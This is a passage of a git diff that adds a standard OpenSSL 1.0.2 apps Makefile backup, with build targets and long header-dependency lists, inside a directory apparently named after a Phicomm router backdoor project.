+version.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+version.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+version.o: ../include/openssl/ui_compat.h ../include/openssl/x509.h
+version.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+version.o: version.c
+x509.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+x509.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+x509.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+x509.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+x509.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+x509.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+x509.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+x509.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+x509.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+x509.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+x509.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+x509.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+x509.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+x509.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+x509.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h x509.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.bak
new file mode 100644
index 0000000..d71d328
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.bak
@@ -0,0 +1,903 @@
+#
+#  apps/Makefile
+#
+
+DIR=		apps
+TOP=		..
+CC=		cc
+INCLUDES=	-I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=		-g -static
+MAKEFILE=	Makefile
+PERL=		perl
+RM=		rm -f
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+
+PEX_LIBS=
+EX_LIBS= 
+EXE_EXT= 
+
+SHLIB_TARGET=
+
+CFLAGS= -DMONOLITH $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile makeapps.com install.com
+
+DLIBCRYPTO=../libcrypto.a
+DLIBSSL=../libssl.a
+LIBCRYPTO=-L.. -lcrypto
+LIBSSL=-L.. -lssl
+
+PROGRAM= openssl
+
+SCRIPTS=CA.sh CA.pl tsget
+
+EXE= $(PROGRAM)$(EXE_EXT)
+
+E_EXE=	verify asn1pars req dgst dh dhparam enc passwd gendh errstr \
+	ca crl rsa rsautl dsa dsaparam ec ecparam \
+	x509 genrsa gendsa genpkey s_server s_client speed \
+	s_time version pkcs7 cms crl2pkcs7 sess_id ciphers nseq pkcs12 \
+	pkcs8 pkey pkeyparam pkeyutl spkac smime rand engine ocsp prime ts srp
+
+PROGS= $(PROGRAM).c
+
+A_OBJ=apps.o
+A_SRC=apps.c
+S_OBJ=	s_cb.o s_socket.o
+S_SRC=	s_cb.c s_socket.c
+RAND_OBJ=app_rand.o
+RAND_SRC=app_rand.c
+
+E_OBJ=	verify.o asn1pars.o req.o dgst.o dh.o dhparam.o enc.o passwd.o gendh.o errstr.o \
+	ca.o pkcs7.o crl2p7.o crl.o \
+	rsa.o rsautl.o dsa.o dsaparam.o ec.o ecparam.o \
+	x509.o genrsa.o gendsa.o genpkey.o s_server.o s_client.o speed.o \
+	s_time.o $(A_OBJ) $(S_OBJ) $(RAND_OBJ) version.o sess_id.o \
+	ciphers.o nseq.o pkcs12.o pkcs8.o pkey.o pkeyparam.o pkeyutl.o \
+	spkac.o smime.o cms.o rand.o engine.o ocsp.o prime.o ts.o srp.o
+
+E_SRC=	verify.c asn1pars.c req.c dgst.c dh.c enc.c passwd.c gendh.c errstr.c ca.c \
+	pkcs7.c crl2p7.c crl.c \
+	rsa.c rsautl.c dsa.c dsaparam.c ec.c ecparam.c \
+	x509.c genrsa.c gendsa.c genpkey.c s_server.c s_client.c speed.c \
+	s_time.c $(A_SRC) $(S_SRC) $(RAND_SRC) version.c sess_id.c \
+	ciphers.c nseq.c pkcs12.c pkcs8.c pkey.c pkeyparam.c pkeyutl.c \
+	spkac.c smime.c cms.c rand.c engine.c ocsp.c prime.c ts.c srp.c
+
+SRC=$(E_SRC)
+
+EXHEADER=
+HEADER=	apps.h progs.h s_apps.h \
+	testdsa.h testrsa.h \
+	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	@(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	exe
+
+exe:	$(EXE)
+
+req: sreq.o $(A_OBJ) $(DLIBCRYPTO)
+	shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=req OBJECTS="sreq.o $(A_OBJ) $(RAND_OBJ)" \
+		LIBDEPS="$(PEX_LIBS) $(LIBCRYPTO) $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+sreq.o: req.c 
+	$(CC) -c $(INCLUDES) $(CFLAG) -o sreq.o req.c
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@set -e; for i in $(EXE); \
+	do  \
+	(echo installing $$i; \
+	 cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+	 done;
+	@set -e; for i in $(SCRIPTS); \
+	do  \
+	(echo installing $$i; \
+	 cp $$i $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	 chmod 755 $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	 mv -f $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i ); \
+	 done
+	@cp openssl.cnf $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new; \
+	chmod 644 $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new; \
+	mv -f  $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+links:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(SRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f CA.pl
+
+clean:
+	rm -f *.o *.obj *.dll lib tags core .pure .nfs* *.old *.bak fluff $(EXE)
+	rm -f req
+
+$(DLIBSSL):
+	(cd ..; $(MAKE) DIRS=ssl all)
+
+$(DLIBCRYPTO):
+	(cd ..; $(MAKE) DIRS=crypto all)
+
+$(EXE): progs.h $(E_OBJ) $(PROGRAM).o $(DLIBCRYPTO) $(DLIBSSL)
+	$(RM) $(EXE)
+	shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	elif [ -n "$(FIPSCANLIB)" ]; then \
+	  FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; export CC FIPSLD_CC; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBKRB5) $(LIBCRYPTO)" ; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=$(EXE) OBJECTS="$(PROGRAM).o $(E_OBJ)" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+	@(cd ..; $(MAKE) rehash)
+
+progs.h: progs.pl
+	$(PERL) progs.pl $(E_EXE) >progs.h
+	$(RM) $(PROGRAM).o
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+app_rand.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+app_rand.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+app_rand.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+app_rand.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+app_rand.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+app_rand.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+app_rand.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+app_rand.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+app_rand.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+app_rand.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+app_rand.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+app_rand.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h
+app_rand.o: app_rand.c apps.h
+apps.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+apps.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+apps.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+apps.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+apps.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+apps.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+apps.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+apps.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+apps.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+apps.o: ../include/openssl/pkcs12.h ../include/openssl/pkcs7.h
+apps.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+apps.o: ../include/openssl/sha.h ../include/openssl/stack.h
+apps.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+apps.o: ../include/openssl/ui.h ../include/openssl/x509.h
+apps.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.c apps.h
+asn1pars.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+asn1pars.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+asn1pars.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+asn1pars.o: ../include/openssl/err.h ../include/openssl/evp.h
+asn1pars.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+asn1pars.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+asn1pars.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+asn1pars.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+asn1pars.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+asn1pars.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+asn1pars.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+asn1pars.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+asn1pars.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+asn1pars.o: asn1pars.c
+ca.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ca.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ca.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ca.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ca.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+ca.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ca.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ca.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ca.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ca.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+ca.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ca.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+ca.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ca.o: ../include/openssl/x509v3.h apps.h ca.c
+ciphers.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ciphers.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ciphers.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+ciphers.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ciphers.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ciphers.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ciphers.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ciphers.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ciphers.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ciphers.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ciphers.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ciphers.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ciphers.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ciphers.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ciphers.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ciphers.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ciphers.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+ciphers.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+ciphers.o: ciphers.c
+cms.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+cms.o: ../include/openssl/buffer.h ../include/openssl/cms.h
+cms.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+cms.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+cms.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+cms.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+cms.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+cms.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+cms.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+cms.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+cms.o: ../include/openssl/sha.h ../include/openssl/stack.h
+cms.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+cms.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+cms.o: ../include/openssl/x509v3.h apps.h cms.c
+crl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+crl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+crl.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+crl.o: ../include/openssl/err.h ../include/openssl/evp.h
+crl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+crl.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+crl.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+crl.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+crl.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+crl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+crl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+crl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+crl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h crl.c
+crl2p7.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+crl2p7.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+crl2p7.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+crl2p7.o: ../include/openssl/err.h ../include/openssl/evp.h
+crl2p7.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+crl2p7.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+crl2p7.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+crl2p7.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+crl2p7.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+crl2p7.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+crl2p7.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+crl2p7.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+crl2p7.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+crl2p7.o: crl2p7.c
+dgst.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dgst.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+dgst.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+dgst.o: ../include/openssl/err.h ../include/openssl/evp.h
+dgst.o: ../include/openssl/hmac.h ../include/openssl/lhash.h
+dgst.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dgst.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dgst.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dgst.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dgst.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dgst.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dgst.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dgst.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dgst.o: ../include/openssl/x509v3.h apps.h dgst.c
+dh.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dh.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dh.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dh.o: ../include/openssl/dh.h ../include/openssl/e_os2.h
+dh.o: ../include/openssl/err.h ../include/openssl/evp.h
+dh.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+dh.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+dh.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+dh.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+dh.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+dh.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+dh.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+dh.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+dh.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h dh.c
+dsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dsa.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+dsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+dsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dsa.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dsa.o: ../include/openssl/x509v3.h apps.h dsa.c
+dsaparam.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dsaparam.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dsaparam.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dsaparam.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+dsaparam.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dsaparam.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+dsaparam.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dsaparam.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dsaparam.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dsaparam.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dsaparam.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dsaparam.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dsaparam.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dsaparam.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dsaparam.o: ../include/openssl/x509v3.h apps.h dsaparam.c
+ec.o: ../include/openssl/opensslconf.h ec.c
+ecparam.o: ../include/openssl/opensslconf.h ecparam.c
+enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+enc.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+enc.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+enc.o: ../include/openssl/err.h ../include/openssl/evp.h
+enc.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+enc.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+enc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+enc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+enc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+enc.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+enc.o: ../include/openssl/sha.h ../include/openssl/stack.h
+enc.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+enc.o: ../include/openssl/x509v3.h apps.h enc.c
+engine.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+engine.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+engine.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+engine.o: ../include/openssl/err.h ../include/openssl/evp.h
+engine.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+engine.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+engine.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+engine.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+engine.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+engine.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+engine.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+engine.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+engine.o: engine.c
+errstr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+errstr.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+errstr.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+errstr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+errstr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+errstr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+errstr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+errstr.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+errstr.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+errstr.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+errstr.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+errstr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+errstr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+errstr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+errstr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+errstr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+errstr.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+errstr.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+errstr.o: errstr.c
+gendh.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+gendh.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+gendh.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+gendh.o: ../include/openssl/dh.h ../include/openssl/e_os2.h
+gendh.o: ../include/openssl/err.h ../include/openssl/evp.h
+gendh.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+gendh.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+gendh.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+gendh.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+gendh.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+gendh.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+gendh.o: ../include/openssl/sha.h ../include/openssl/stack.h
+gendh.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+gendh.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+gendh.o: ../include/openssl/x509v3.h apps.h gendh.c
+gendsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+gendsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+gendsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+gendsa.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+gendsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+gendsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+gendsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+gendsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+gendsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+gendsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+gendsa.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+gendsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+gendsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+gendsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+gendsa.o: ../include/openssl/x509v3.h apps.h gendsa.c
+genpkey.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+genpkey.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+genpkey.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+genpkey.o: ../include/openssl/err.h ../include/openssl/evp.h
+genpkey.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+genpkey.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+genpkey.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+genpkey.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+genpkey.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+genpkey.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+genpkey.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+genpkey.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+genpkey.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+genpkey.o: genpkey.c
+genrsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+genrsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+genrsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+genrsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+genrsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+genrsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+genrsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+genrsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+genrsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+genrsa.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+genrsa.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+genrsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+genrsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+genrsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+genrsa.o: ../include/openssl/x509v3.h apps.h genrsa.c
+nseq.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+nseq.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+nseq.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+nseq.o: ../include/openssl/err.h ../include/openssl/evp.h
+nseq.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+nseq.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+nseq.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+nseq.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+nseq.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+nseq.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+nseq.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+nseq.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+nseq.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h nseq.c
+ocsp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ocsp.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ocsp.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ocsp.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ocsp.o: ../include/openssl/err.h ../include/openssl/evp.h
+ocsp.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ocsp.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ocsp.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+ocsp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ocsp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ocsp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ocsp.o: ../include/openssl/pqueue.h ../include/openssl/safestack.h
+ocsp.o: ../include/openssl/sha.h ../include/openssl/srtp.h
